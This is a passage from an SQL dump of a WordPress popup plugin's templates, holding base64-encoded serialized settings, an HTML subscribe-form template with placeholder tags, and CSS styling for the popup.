6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8wIjtzOjc6IiM4MWQ3NDIiO3M6MTE6ImZvbnRfZm9vdGVyIjtzOjc6ImRlZmF1bHQiO3M6MTc6ImZvb3Rlcl9mb250X2NvbG9yIjtzOjc6IiM1ODU4NTgiO3M6OToiY2xvc2VfYnRuIjtzOjI3OiJjbG9zZS1ibGFjay1pbi13aGl0ZS1jaXJjbGUiO3M6NzoiYnVsbGV0cyI7czoxMToibGlzdHNfZ3JlZW4iO3M6MTM6ImVuYl9zdWJzY3JpYmUiO3M6MToiMSI7czo4OiJzdWJfZGVzdCI7czo5OiJ3b3JkcHJlc3MiO3M6MjM6InN1Yl93cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjE5OiJzdWJfYXdlYmVyX2xpc3RuYW1lIjtzOjA6IiI7czoyMToic3ViX2F3ZWJlcl9hZHRyYWNraW5nIjtzOjA6IiI7czoyMToic3ViX21haWxjaGltcF9hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX2dyX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX3VybCI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfa2V5IjtzOjA6IiI7czoxODoic3ViX2FyX2Zvcm1fYWN0aW9uIjtzOjA6IiI7czoxMDoic3ViX3NnYV9pZCI7czowOiIiO3M6MTU6InN1Yl9zZ2FfbGlzdF9pZCI7czowOiIiO3M6MjE6InN1Yl9zZ2FfYWN0aXZhdGVfY29kZSI7czowOiIiO3M6MTA6InN1Yl9maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjY6e3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InN1Yl90eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJzdWJfdHh0X3N1Y2Nlc3MiO3M6MjQ6IlRoYW5rIHlvdSBmb3Igc3Vic2NyaWJlISI7czoyMToic3ViX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czoyOiJHbyI7czoxNToiZW5iX3NtX2ZhY2Vib29rIjtzOjE6IjEiO3M6MTc6ImVuYl9zbV9nb29nbGVwbHVzIjtzOjE6IjEiO3M6MTQ6ImVuYl9zbV90d2l0dGVyIjtzOjE6IjEiO3M6OToic21fZGVzaWduIjtzOjQ6ImJveHkiO3M6ODoiYW5pbV9rZXkiO3M6MTY6InBlcnNwZWN0aXZlX2Rvd24iO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6MDoiIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6OToiZW5iX2xhYmVsIjtzOjE6IjEiO3M6NToibGFiZWwiO3M6MjI6IlN1YnNjcmliZSBhbmQgR2V0IE5ld3MiO3M6OToiZm9vdF9ub3RlIjtzOjExODoiV2UgcmVzcGVjdCB5b3VyIHByaXZhY3kuIFlvdXIgaW5mb3JtYXRpb24gd2lsbCBub3QgYmUgc2hhcmVkIHdpdGggYW55IHRoaXJkIHBhcnR5IGFuZCB5b3UgY2FuIHVuc3Vic2NyaWJlIGF0IGFueSB0aW1lICI7czo1OiJ0eHRfMCI7czozODoiPHA+ZGlzY291bnRzIG9uIGFsbCB0eXBlcyBvZiBnb29kczwvcD4iO31zOjEwOiJvcHRzX2F0dHJzIjthOjI6e3M6OToiYmdfbnVtYmVyIjtzOjE6IjMiO3M6MTY6InR4dF9ibG9ja19udW1iZXIiO3M6MToiMSI7fX0=','<link rel=\"stylesheet\" type=\"text/css\" href=\"//fonts.googleapis.com/css?family=Dancing+Script\" />\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"//fonts.googleapis.com/css?family=Amatic+SC\" />\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			<div class=\"logo\"></div>\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n			[endif]\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input class=\"butt\" type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsRightCol\">\r\n				[if enb_sm]\r\n					<div style=\"clear: both;\"></div>\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: \'arial\', arial;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: content-box;\r\n	-moz-box-sizing:    content-box;\r\n	box-sizing:         content-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 100%;\r\n  	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	box-shadow: 0 0 10px rgba(0,0,0,0.5);\r\n    padding: 60px 0 60px 0;\r\n  	border-radius: 3px;\r\n	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n\r\n#ppsPopupShell_[ID] .logo{\r\n  	display: table;\r\n    width: 150px;\r\n    margin-left: 40%;\r\n    height: 130px;\r\n[if bg_type_2 == \'color\']\r\n	background: [bg_color_2];\r\n	[elseif bg_type_2 == \'img\']\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: auto 100%;\r\n  	[endif]\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #fff;\r\n    font-family: Dancing Script;\r\n	text-align: center;\r\n	font-size: 48px;\r\n	letter-spacing: -1px;\r\n	line-height: 40px;\r\n	letter-spacing: -1px;\r\n	margin-top: 35px;\r\n	display: block;\r\n  	margin-bottom: 35px;;\r\n	padding-left: 20px;\r\n  	text-shadow: 1px 1px 2px black, 0 0 1em [bg_color_1];\r\n	-moz-text-shadow: 1px 1px 2px black, 0 0 1em [bg_color_1];\r\n	-webkit-text-shadow: 1px 1px 2px black, 0 0 1em [bg_color_1];\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 1% 1% 1% 1%;\r\n	text-align:right;\r\n	margin-bottom: 20px;\r\n  	padding-left: 20px;\r\n    margin: 0 auto;\r\n  	width: 60%;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	/*width: 100%;*/\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: 0px solid #d1b36d;\r\n	border-radius: 4px !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	box-shadow: 2px 2px 2px #dcdcdc inset;\r\n  	padding-left: 20px;\r\n  	font-size: 15px;\r\n	width:100%;\r\n  	max-width: 284px;\r\n	display: block;\r\n	float: left;\r\n  	border: 1px solid #e2e2e2;\r\n  	margin-top: 1px;\r\n  	background-color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n  	border-radius: 4px !important;\r\n  	margin-left: -1px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n	min-width: 65px;\r\n	height: 60px;\r\n  	padding: 6px 0 0 0;\r\n  	text-align: center;\r\n 	cursor: pointer;\r\n  	text-decoration: none;\r\n  	color: #333333;\r\n  	font-family: Dancing Script;\r\n  	border-radius:50% !important;\r\n  	text-shadow: 0px 1px 0px #FFF;\r\n  	display:block;\r\n  	float: left;\r\n	margin-left: -15px;\r\n  	margin-top: -5px;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: [bg_color_1] 100%;\r\n   	box-shadow: -4px -4px 0px rgba(0, 0, 0, 0.1) inset;\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n  	color: #fff;\r\n    font-size: 30px;\r\n    text-shadow: 1px 1px 1px #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n   box-shadow: 4px 4px 0px rgba(0, 0, 0, 0.1) inset;\r\n	\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n	float: left;\r\n  	width: 90%;\r\n	font-family: \'PT Sans\', sans-serif;\r\n  	color: [bg_color_1];\r\n  	font-size: 25px;\r\n  	line-height: 25px;\r\n  	display: block;\r\n  	margin-bottom: 27px;\r\n    padding: 0px 20px 0px 20px;\r\n  	text-align: center;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n	top: -5px !important;\r\n  	right: -10px !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm{\r\n	margin-top:20px;\r\n}\r\n.ppsPopupShell .ppsErrorMsg{\r\n  width: 200px;\r\n}\r\n\r\n','highlights.png',1,1,1,1,0,0,0,'2015-01-10 17:59:43',10,0),(27,'New York',1,0,'YTozOntzOjQ6Im1haW4iO2E6MzA6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjtzOjI0OiJoaWRlX2Zvcl91c2VyX3JvbGVzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjEwOTp7czo1OiJ3aWR0aCI7czozOiI4MjQiO3M6MTM6IndpZHRoX21lYXN1cmUiO3M6MjoicHgiO3M6MTg6ImJnX292ZXJsYXlfb3BhY2l0eSI7czozOiIwLjUiO3M6MTU6ImJnX292ZXJsYXlfdHlwZSI7czo1OiJjb2xvciI7czoxNjoiYmdfb3ZlcmxheV9jb2xvciI7czo0OiIjMDAwIjtzOjE0OiJiZ19vdmVybGF5X2ltZyI7czowOiIiO3M6MTg6ImJnX292ZXJsYXlfaW1nX3BvcyI7czo3OiJzdHJldGNoIjtzOjk6ImJnX3R5cGVfMCI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMCI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiI2ZmZmZmZiI7czo5OiJiZ190eXBlXzEiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzEiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiM4YmE2ZTgiO3M6OToiYmdfdHlwZV8yIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18yIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMiI7czo3OiIjZmZjMThkIjtzOjEwOiJmb250X2xhYmVsIjtzOjc6ImRlZmF1bHQiO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiI2ZmZmZmZiI7czoxMDoiZm9udF90eHRfMCI7czo3OiJkZWZhdWx0IjtzOjE3OiJ0ZXh0X2ZvbnRfY29sb3JfMCI7czo3OiIjODg4ODg4IjtzOjExOiJmb250X2Zvb3RlciI7czo3OiJkZWZhdWx0IjtzOjE3OiJmb290ZXJfZm9udF9jb2xvciI7czo3OiIjZmZmZmZmIjtzOjE1OiJyZXNwb25zaXZlX21vZGUiO3M6MzoiZGVmIjtzOjE3OiJyZWlkcmVjdF9vbl9jbG9zZSI7czowOiIiO3M6OToiY2xvc2VfYnRuIjtzOjExOiJ3aGlsZV9jbG9zZSI7czo3OiJidWxsZXRzIjtzOjEyOiJjaXJjbGVfZ3JlZW4iO3M6MTE6ImxheWVyZWRfcG9zIjtzOjM6InRvcCI7czo5OiJlbmJfbGFiZWwiO3M6MToiMSI7czo1OiJsYWJlbCI7czo2NjoiU3Vic2NyaWJlIHRvIG91ciBuZXdzbGV0dGVyIGFuZCBzdGFydCBpbmNyZWFzaW5nIHlvdXIgcHJvZml0cyBub3chIjtzOjk6ImVuYl90eHRfMCI7czoxOiIxIjtzOjEzOiJlbmJfZm9vdF9ub3RlIjtzOjE6IjEiO3M6OToiZm9vdF9ub3RlIjtzOjQ1OiJXZSBuZXZlciBzaGFyZSB5b3VyIGUtbWFpbCB3aXRoIHRoaXJkIHBhcnRpZXMiO3M6MTU6ImVuYl9zbV9mYWNlYm9vayI7czoxOiIxIjtzOjE3OiJlbmJfc21fZ29vZ2xlcGx1cyI7czoxOiIxIjtzOjE0OiJlbmJfc21fdHdpdHRlciI7czoxOiIxIjtzOjk6InNtX2Rlc2lnbiI7czo2OiJzaW1wbGUiO3M6ODoiYW5pbV9rZXkiO3M6NDoibm9uZSI7czoxMzoiYW5pbV9kdXJhdGlvbiI7czowOiIiO3M6MTM6ImVuYl9zdWJzY3JpYmUiO3M6MToiMSI7czo4OiJzdWJfZGVzdCI7czo5OiJ3b3JkcHJlc3MiO3M6MjM6InN1Yl93cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjE5OiJzdWJfYXdlYmVyX2xpc3RuYW1lIjtzOjA6IiI7czoyMToic3ViX2F3ZWJlcl9hZHRyYWNraW5nIjtzOjA6IiI7czoyMToic3ViX21haWxjaGltcF9hcGlfa2V5IjtzOjA6IiI7czoyNToic3ViX21haWxjaGltcF9ncm91cHNfZnVsbCI7czowOiIiO3M6MTQ6InN1Yl9ncl9hcGlfa2V5IjtzOjA6IiI7czoxNjoic3ViX2dyX2N5Y2xlX2RheSI7czoxOiIwIjtzOjEzOiJzdWJfaWNfYXBwX2lkIjtzOjA6IiI7czoxNToic3ViX2ljX2FwcF91c2VyIjtzOjA6IiI7czoxNToic3ViX2ljX2FwcF9wYXNzIjtzOjA6IiI7czoxNDoic3ViX2FjX2FwaV91cmwiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX2tleSI7czowOiIiO3M6MTg6InN1Yl9hcl9mb3JtX2FjdGlvbiI7czowOiIiO3M6MTA6InN1Yl9zZ2FfaWQiO3M6MDoiIjtzOjE1OiJzdWJfc2dhX2xpc3RfaWQiO3M6MDoiIjtzOjIxOiJzdWJfc2dhX2FjdGl2YXRlX2NvZGUiO3M6MDoiIjtzOjEzOiJzdWJfc2ZfYXBwX2lkIjtzOjA6IiI7czoxNDoic3ViX2NrX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfbWVtX2FjY19pZCI7czowOiIiO3M6MTU6InN1Yl9tZW1fcHVkX2tleSI7czowOiIiO3M6MTY6InN1Yl9tZW1fcHJpdl9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfc2JfYXBpX2tleSI7czowOiIiO3M6MTQ6InN1Yl92Nl9hcGlfa2V5IjtzOjA6IiI7czoxMjoic3ViX3Z0aWdfdXJsIjtzOjA6IiI7czoxMzoic3ViX3Z0aWdfbmFtZSI7czowOiIiO3M6MTI6InN1Yl92dGlnX2tleSI7czowOiIiO3M6MTY6InN1Yl95bWxwX2FwaV9rZXkiO3M6MDoiIjtzOjEzOiJzdWJfeW1scF9uYW1lIjtzOjA6IiI7czoxMToic3ViXzRkX25hbWUiO3M6MDoiIjtzOjExOiJzdWJfNGRfcGFzcyI7czowOiIiO3M6MTA6InN1Yl9maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjg6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7czoxMDoic2V0X3ByZXNldCI7czowOiIiO31zOjU6ImVtYWlsIjthOjg6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czoxMDoic2V0X3ByZXNldCI7czowOiIiO3M6MzoiZW5iIjtzOjE6IjEiO319czo5OiJibGFja2xpc3QiO3M6MDoiIjtzOjIwOiJzdWJfdHh0X2NvbmZpcm1fc2VudCI7czo2NzoiQ29uZmlybWF0aW9uIGxpbmsgd2FzIHNlbnQgdG8geW91ciBlbWFpbCBhZGRyZXNzLiBDaGVjayB5b3VyIGVtYWlsISI7czoxNToic3ViX3R4dF9zdWNjZXNzIjtzOjI0OiJUaGFuayB5b3UgZm9yIHN1YnNjcmliZSEiO3M6MjE6InN1Yl90eHRfaW52YWxpZF9lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoyMDoic3ViX3R4dF9leGlzdHNfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MTY6InN1Yl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHN1YnNjcmlwdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTc6IllvdSBzdWJzY3JpYmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHN1YnNjcmlwdGlvbi4gSWYgeW91IGRpZCBub3Qgc3Vic2NyaWJlIGhlcmUgLSBqdXN0IGlnbm9yZSB0aGlzIG1lc3NhZ2UuIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9zdWJqZWN0IjtzOjM3OiJbc2l0ZW5hbWVdIFlvdXIgdXNlcm5hbWUgYW5kIHBhc3N3b3JkIjtzOjI4OiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfbWVzc2FnZSI7czo2NToiVXNlcm5hbWU6IFt1c2VyX2xvZ2luXTxiciAvPlBhc3N3b3JkOiBbcGFzc3dvcmRdPGJyIC8+W2xvZ2luX3VybF0iO3M6MjU6InN1Yl9yZWRpcmVjdF9lbWFpbF9leGlzdHMiO3M6MDoiIjtzOjEzOiJzdWJfYnRuX2xhYmVsIjtzOjEzOiJTVUJTQ1JJQkUgTk9XIjtzOjEzOiJzdWJfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToic3ViX25ld19zdWJqZWN0IjtzOjI4OiJOZXcgc3Vic2NyaWJlciBvbiBbc2l0ZW5hbWVdIjtzOjE1OiJzdWJfbmV3X21lc3NhZ2UiO3M6MTI5OiJZb3UgaGF2ZSBuZXcgc3Vic2NyaWJlciBvbiB5b3VyIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LCBoZXJlIGlzIHN1YnNjcmliZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6ODoibG9naW5fYnkiO3M6ODoidXNlcm5hbWUiO3M6MTg6ImxvZ2luX3JlZGlyZWN0X3VybCI7czowOiIiO3M6MTU6ImxvZ2luX2J0bl9sYWJlbCI7czoxMDoi0JvQvtCz0LjQvSI7czoyMzoicmVnX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTM6InJlZ19idG5fbGFiZWwiO3M6ODoiUmVnaXN0ZXIiO3M6MTA6InJlZ19maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiLQmNC80Y8iO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0O